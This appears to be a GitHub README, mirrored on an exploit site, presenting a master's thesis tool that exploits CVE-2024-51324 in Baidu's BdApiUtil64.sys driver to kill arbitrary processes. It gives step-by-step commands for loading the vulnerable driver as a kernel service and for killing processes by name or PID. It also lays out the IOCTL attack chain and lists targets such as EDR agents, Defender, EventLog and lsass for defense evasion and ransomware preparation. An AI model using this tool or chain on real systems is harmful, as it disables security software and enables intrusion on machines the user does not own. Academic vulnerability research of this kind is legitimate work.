Share
## https://sploitus.com/exploit?id=67F51425-1418-5182-A750-19B4712448F7
# CVE-2024-51324 β€” BYOVD: BdApiUtil64.sys Process Killer Β· Master's Thesis Research

[![Platform](https://img.shields.io/badge/Platform-Windows-blue)](https://nvd.nist.gov/vuln/detail/CVE-2024-51324)
[![Language](https://img.shields.io/badge/Language-Python-informational)](https://github.com/devianntsec)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE)
[![Research](https://img.shields.io/badge/Research-Master's%20Thesis-purple)](https://github.com/devianntsec)
[![CVSS](https://img.shields.io/badge/CVSS-7.8%20(High)-orange)](https://nvd.nist.gov/vuln/detail/CVE-2024-51324)

> **Bring Your Own Vulnerable Driver (BYOVD) β€” Baidu Antivirus `BdApiUtil64.sys`**  
> Arbitrary process termination from any user context via exposed IOCTL  
> Affected: BdApiUtil64.sys (Baidu Antivirus 7.0.0.51176 and earlier)

---


   
  
  Loading the vulnerable driver into kernel (LOADER mode)


## Description

This repository contains my **Master's Thesis research** on **CVE-2024-51324**, a High-severity (CVSS 7.8) **Bring Your Own Vulnerable Driver (BYOVD)** vulnerability in Baidu Antivirus's kernel driver `BdApiUtil64.sys`.

The vulnerability originates from an **improperly access-controlled IOCTL handler** (`0x800024B4`) exposed by the driver's device object `\\.\BdApiUtil`. Any unprivileged user-mode process can open the device and send a process identifier as input, causing the kernel driver to terminate that process β€” including protected, elevated, or security-sensitive ones β€” without any privilege check.

### My Contribution

| Aspect | Description |
|--------|-------------|
| **Four operation modes** | LOADER, KILLER, SCANNER, and CLEANUP β€” complete lifecycle management |
| **Automated driver search** | Multi-path driver discovery with SHA-256 hash verification |
| **Empirical driver analysis** | IOCTL reverse engineering, device path analysis, and access control audit |
| **Post-exploitation documentation** | Defense evasion and security tool termination scenarios |
| **Academic documentation** | Root cause, driver analysis, and vulnerability timeline |

---

## Repository Structure

```
CVE-2024-51324-BYOVD-Masters-Thesis/
β”œβ”€β”€ README.md                        # This file
β”œβ”€β”€ LICENSE                          # MIT License
β”‚
β”œβ”€β”€ drivers/                         # Vulnerable driver location
β”‚   └── BdApiUtil64.sys              # Driver (not distributed)
β”‚
β”œβ”€β”€ exploit/
β”‚   β”œβ”€β”€ exploit-explanation.md       # Exploit usage documentation
β”‚   └── byovd_killer.py              # Main exploit β€” 4 operational modes
β”‚
└── docs/
    β”œβ”€β”€ screenshots/                 # Exploitation demonstrations
    β”‚   β”œβ”€β”€ 01-byovd-scan.png
    β”‚   β”œβ”€β”€ 02-byovd-scan-target.png
    β”‚   β”œβ”€β”€ 03-byovd-load.png
    β”‚   β”œβ”€β”€ 04-byovd-load-custom.png
    β”‚   β”œβ”€β”€ 05-kill-name.gif
    β”‚   β”œβ”€β”€ 06-kill-pid.gif
    β”‚   β”œβ”€β”€ 07-kill-limit.gif
    β”‚   β”œβ”€β”€ 08-dry-run.gif
    β”‚   └── 09-byovd-cleanup.png
    β”‚
    └── analysis/
        β”œβ”€β”€ 01-root-cause.md         # Vulnerability root cause analysis
        β”œβ”€β”€ 02-driver-analysis.md    # IOCTL reverse engineering & empirical findings
        └── 03-timeline.md           # CVE timeline
```

---

## Quick Start

### Prerequisites

- Windows 10/11 (any build)
- Python 3.6+
- `BdApiUtil64.sys` β€” the vulnerable driver binary (obtain from Baidu Antivirus 7.x installation)
- Administrator account (for LOADER and CLEANUP modes only)
- Standard user account sufficient for KILLER mode once driver is loaded

### Step 1 β€” Scan the system

```bash
python exploit/byovd_killer.py --scan
python exploit/byovd_killer.py --scan --target lsass.exe
```

### Step 2 β€” Load the driver (Admin required)

```bash
# Default driver in drivers/ folder
python exploit/byovd_killer.py --load

# Custom driver path
python exploit/byovd_killer.py --load --driver C:\path\to\BdApiUtil64.sys

# Custom service name
python exploit/byovd_killer.py --load --service-name MyService
```

### Step 3 β€” Kill processes (No admin required)

```bash
# Kill all instances of a process by name
python exploit/byovd_killer.py --kill notepad.exe

# Kill specific PID
python exploit/byovd_killer.py --pid 1234

# Limit to 2 instances
python exploit/byovd_killer.py --kill notepad.exe --max-instances 2

# Dry run (simulate without killing)
python exploit/byovd_killer.py --kill notepad.exe --dry-run
```

### Step 4 β€” Cleanup (Admin required)

```bash
python exploit/byovd_killer.py --cleanup
python exploit/byovd_killer.py --cleanup --service-name MyService
```

---

## Operational Modes

| Mode | Command | Privileges | Description |
|------|---------|------------|-------------|
| **SCANNER** | `--scan` | Any user | System and driver status information |
| **LOADER** | `--load` | Admin | Load driver into kernel via service creation |
| **KILLER** | `--kill` / `--pid` | Any user | Terminate processes via IOCTL |
| **CLEANUP** | `--cleanup` | Admin | Stop and delete driver service |

---

## Demonstrations

### SCANNER Mode β€” System Information
![SCANNER Mode](docs/screenshots/01-byovd-scan.png)

### SCANNER Mode β€” Target Process Search
![SCANNER Target](docs/screenshots/02-byovd-scan-target.png)

### LOADER Mode β€” Loading Driver
![LOADER Mode](docs/screenshots/03-byovd-load.png)

### LOADER Mode β€” Custom Path and Service Name
![LOADER Custom](docs/screenshots/04-byovd-load-custom.png)

### KILLER Mode β€” Kill by Process Name
![Kill by Name](docs/screenshots/05-kill-name.gif)

### KILLER Mode β€” Kill by PID
![Kill by PID](docs/screenshots/06-kill-pid.gif)

### KILLER Mode β€” Limit Instances
![Limit Instances](docs/screenshots/07-kill-limit.gif)

### KILLER Mode β€” Dry Run (Simulation)
![Dry Run](docs/screenshots/08-dry-run.gif)

### CLEANUP Mode β€” Unload Driver
![CLEANUP Mode](docs/screenshots/09-byovd-cleanup.png)

---

## Technical Overview

### Vulnerability Root Cause

`BdApiUtil64.sys` registers a device object accessible at `\\.\BdApiUtil`. Its `IRP_MJ_DEVICE_CONTROL` handler accepts IOCTL code `0x800024B4` with a 4-byte input buffer containing a target process ID. The handler calls `ZwTerminateProcess` on the supplied PID **without any security descriptor check, privilege verification, or caller integrity level validation**.

```
User-mode (any integrity level)
  β”‚
  β”œβ”€ CreateFile("\\.\BdApiUtil", GENERIC_READ | GENERIC_WRITE)
  β”‚    └─ Succeeds for any user β€” no DACL restriction on device object
  β”‚
  └─ DeviceIoControl(hDevice, 0x800024B4, &pid, 4, ...)
       └─ Kernel driver calls ZwTerminateProcess(pid) unconditionally
```

### Why It Matters: BYOVD Context

The BYOVD technique allows a threat actor to bring a legitimately signed (but vulnerable) driver onto a target system and load it via a kernel service. Once loaded, the driver's exposed attack surface is accessible to any user. In this case:

- The driver is signed by Baidu, passing driver signature enforcement
- Loading requires administrator once; exploitation requires no further elevation
- Security products, EDR agents, and protected processes become terminable

### Attack Chain

```
1. [ADMIN]   Drop BdApiUtil64.sys to disk
2. [ADMIN]   Create kernel service β†’ sc create ... type= kernel
3. [ADMIN]   Start service β†’ driver loaded into kernel
4. [ANY USER] Open \\.\BdApiUtil device handle
5. [ANY USER] Send IOCTL 0x800024B4 with target PID
6. [KERNEL]  ZwTerminateProcess() called β€” process terminated
```

---

## Empirical Analysis

IOCTL reverse engineering was performed on `BdApiUtil64.sys` SHA-256 `47EC51B5F0EDE1E70BD66F3F0152F9EB536D534565DBB7FCC3A05F542DBE4428`.

| Observable | Value | Notes |
|-----------|-------|-------|
| Device name | `\\.\BdApiUtil` | Accessible to any user |
| IOCTL code | `0x800024B4` | Method: METHOD_NEITHER |
| Input size | 4 bytes | DWORD process ID |
| Output size | 4 bytes | Status code |
| Access check | None | No privilege validation |
| Driver signature | Valid (Baidu) | Passes KMCS |

Full analysis documented in [`docs/analysis/02-driver-analysis.md`](docs/analysis/02-driver-analysis.md).

---

## Post-Exploitation Scenarios

| Scenario | Target | Impact |
|----------|--------|--------|
| EDR/AV termination | `MsMpEng.exe`, `SentinelAgent.exe` | Defense evasion |
| Audit log disruption | `EventLog` service | Tamper with forensics |
| Protected process bypass | `lsass.exe` | Credential access facilitator |
| Ransomware defense evasion | Security agents | Pre-encryption preparation |

---

## Technical Documentation

| Document | Description |
|----------|-------------|
| [Root Cause Analysis](docs/analysis/01-root-cause.md) | Missing access control in IRP_MJ_DEVICE_CONTROL handler |
| [Driver Analysis](docs/analysis/02-driver-analysis.md) | IOCTL reverse engineering and empirical testing results |
| [CVE Timeline](docs/analysis/03-timeline.md) | Discovery, disclosure, and patch chronology |

---

## Academic Context

This research is part of my **Master's Thesis in Cybersecurity** (UCAM β€” Campus Internacional de Ciberseguridad), analyzing N-Day vulnerabilities across multiple environments.

This CVE represents the **Windows kernel driver / BYOVD** vector within the thesis, demonstrating:
- Kernel driver attack surface analysis via IOCTL enumeration
- Bring Your Own Vulnerable Driver exploitation methodology
- Privilege boundary violation through missing access control checks
- Defense evasion techniques leveraged by real-world threat actors

**Keywords:** `BYOVD` Β· `Kernel Driver` Β· `IOCTL` Β· `Process Termination` Β· `Defense Evasion` Β· `CVE-2024-51324`

---

## Author

**Annais Molina (devianntsec)** β€” Master's Student in Cybersecurity

[![GitHub](https://img.shields.io/badge/GitHub-@devianntsec-181717?style=flat-square&logo=github)](https://github.com/devianntsec)
[![LinkedIn](https://img.shields.io/badge/LinkedIn-Annais%20Molina-0077B5?style=flat-square&logo=linkedin)](https://linkedin.com/in/annais-molina-fuentes)
[![Email](https://img.shields.io/badge/Email-me%40deviannt.com-D14836?style=flat-square&logo=gmail)](mailto:me@deviannt.com)

---

## Acknowledgments

- [**NVD / NIST**](https://nvd.nist.gov/vuln/detail/CVE-2024-51324) β€” CVE record and scoring
- [**EDR Telemetry Project**](https://github.com/tsale/EDR-Telemetry) β€” BYOVD driver database reference
- **loldrivers.io** β€” Community-maintained vulnerable driver index

---

## License

MIT License β€” see [LICENSE](LICENSE)

---

## Legal Disclaimer

This repository is provided **for educational and security research purposes only**, as part of an academic Master's Thesis. All testing was performed on isolated virtual machines with no network exposure. The vulnerable driver (`BdApiUtil64.sys`) is not distributed in this repository β€” it must be obtained independently. Use only on systems you own or have explicit written authorization to test. Unauthorized use against systems is illegal and may result in criminal prosecution.


  Β© 2026 Annais Molina Β· Master's Thesis in Cybersecurity
  UCAM Universidad CatΓ³lica San Antonio de Murcia Β· Campus Internacional de Ciberseguridad